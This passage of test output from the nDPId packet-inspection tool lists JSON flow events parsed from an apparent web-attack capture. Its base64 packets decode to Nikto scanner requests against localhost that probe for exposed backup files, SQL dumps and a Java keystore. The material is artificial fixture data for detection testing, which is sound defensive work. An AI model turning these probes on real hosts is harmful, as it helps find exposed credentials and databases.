{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276998,"flow_last_seen":1576420276998,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49964,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1576420276998,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276998,"pkt":"AAAAAAAAAAAAAAAACABFAADDYPVAAEAG2z1\/AAABfwAAAcMsH5ARV1iTIbZBJoAYAED+twAAAQEICp1m\/C2dZvwtR0VUIC8xMjcuMC4wLnNxbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276998,"flow_last_seen":1576420276998,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49964,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":211,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276999,"flow_last_seen":1576420276999,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276999,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49966,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1576420276999,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276999,"pkt":"AAAAAAAAAAAAAAAACABFAADByvVAAEAGcT9\/AAABfwAAAcMuH5AHevKTkcnpoIAYAED+tQAAAQEICp1m\/C+dZvwvR0VUIC8xMjcwMC50YXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} 
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276999,"flow_last_seen":1576420276999,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276999,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49966,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":212,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277000,"flow_last_seen":1576420277000,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":1576420277000,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277000,"pkt":"AAAAAAAAAAAAAAAACABFAADBBihAAEAGNg1\/AAABfwAAAcMwH5BEgD5FJ0MuU4AYAED+tQAAAQEICp1m\/DCdZvwwR0VUIC8xMjcwMC50YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":212,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277000,"flow_last_seen":1576420277000,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277001,"flow_last_seen":1576420277001,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49970,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":1576420277001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277001,"pkt":"AAAAAAAAAAAAAAAACABFAADAM9pAAEAGCFx\/AAABfwAAAcMyH5CilAu7EPfGmYAYAED+tAAAAQEICp1m\/DGdZvwxR0VUIC8xMjcwLnppcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":213,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277001,"flow_last_seen":1576420277001,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49970,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277002,"flow_last_seen":1576420277002,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49972,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":1576420277002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277002,"pkt":"AAAAAAAAAAAAAAAACABFAADAUGZAAEAG689\/AAABfwAAAcM0H5Crr2gHBF6lfIAYAED+tAAAAQEICp1m\/DKdZvwyR0VUIC8xMjcwLnppcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277002,"flow_last_seen":1576420277002,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49972,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277004,"flow_last_seen":1576420277004,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1576420277004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277004,"pkt":"AAAAAAAAAAAAAAAACABFAADBfrVAAEAGvX9\/AAABfwAAAcM2H5AiEUbRArZM2IAYAED+tQAAAQEICp1m\/DSdZvw0R0VUIC8xMjcuMC5hbHogSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277004,"flow_last_seen":1576420277004,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277006,"flow_last_seen":1576420277006,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49976,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1576420277006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277006,"pkt":"AAAAAAAAAAAAAAAACABFAADBggJAAEAGujJ\/AAABfwAAAcM4H5AaCbpkhn3rTYAYAED+tQAAAQEICp1m\/DadZvw1R0VUIC8xMjcuMC5hbHogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277006,"flow_last_seen":1576420277006,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49976,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277007,"flow_last_seen":1576420277007,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277007,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49978,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":1576420277007,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277007,"pkt":"AAAAAAAAAAAAAAAACABFAADC7TtAAEAGTvh\/AAABfwAAAcM6H5D6jdVeqyQPZoAYAED+tgAAAQEICp1m\/DedZvw3R0VUIC9iYWNrdXAuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} 
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":217,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277007,"flow_last_seen":1576420277007,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277007,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49978,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277010,"flow_last_seen":1576420277010,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49980,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":1576420277010,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277010,"pkt":"AAAAAAAAAAAAAAAACABFAADChG5AAEAGt8V\/AAABfwAAAcM8H5BcKrwJSZEDE4AYAED+tgAAAQEICp1m\/DqdZvw6R0VUIC9iYWNrdXAuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":218,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277010,"flow_last_seen":1576420277010,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49980,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":219,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277011,"flow_last_seen":1576420277011,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277011,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49982,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":1576420277011,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277011,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/sClAAEAGjA1\/AAABfwAAAcM+H5BuqIhDc4THFIAYAED+swAAAQEICp1m\/DudZvw7R0VUIC8xMjcuemlwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277011,"flow_last_seen":1576420277011,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277011,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49982,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":220,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277013,"flow_last_seen":1576420277013,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277013,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1576420277013,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277013,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/xzVAAEAGdQF\/AAABfwAAAcNAH5BZGv9XO\/ACDYAYAED+swAAAQEICp1m\/D2dZvw9R0VUIC8xMjcuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
